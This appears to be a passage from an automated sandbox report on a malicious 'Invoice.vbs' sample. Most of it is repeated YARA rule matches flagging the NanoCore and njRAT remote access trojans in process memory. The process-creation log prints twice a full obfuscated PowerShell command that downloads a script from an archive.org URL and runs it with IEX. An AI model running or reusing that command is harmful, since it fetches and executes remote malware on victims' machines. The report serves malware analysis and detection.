      Source: 20.2.aspnet_compiler.exe.3c47574.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3a25794.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2849aac.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3c47574.16.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3a3884f.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2816288.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 20.2.aspnet_compiler.exe.3a25794.10.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2849aac.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.2849aac.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 20.2.aspnet_compiler.exe.286a330.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.286a330.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000016.00000002.1171008020.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
      Source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 20_2_00D2E480
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 20_2_00D2E471
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 20_2_00D2BBD4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 22_2_01332B48
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 22_2_01330E50
      Source: 3G1J49A6V_Invoice.vbs Initial sample: Strings found which are bigger than 50
      Source: 20.3.aspnet_compiler.exe.3c78ad1.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.3.aspnet_compiler.exe.3c78ad1.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
      Source: 20.2.aspnet_compiler.exe.3c5399f.15.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3c5399f.15.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3c5399f.15.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3c5399f.15.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3c47574.16.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3c47574.16.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3a25794.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3a25794.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2849aac.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.2849aac.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.3.aspnet_compiler.exe.3c73e32.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3c47574.16.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3c47574.16.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3a33bb0.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3a3884f.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3a3884f.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.3.aspnet_compiler.exe.3c6abfe.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2816288.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.2816288.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2855cf4.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 20.2.aspnet_compiler.exe.3a25794.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3a25794.10.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
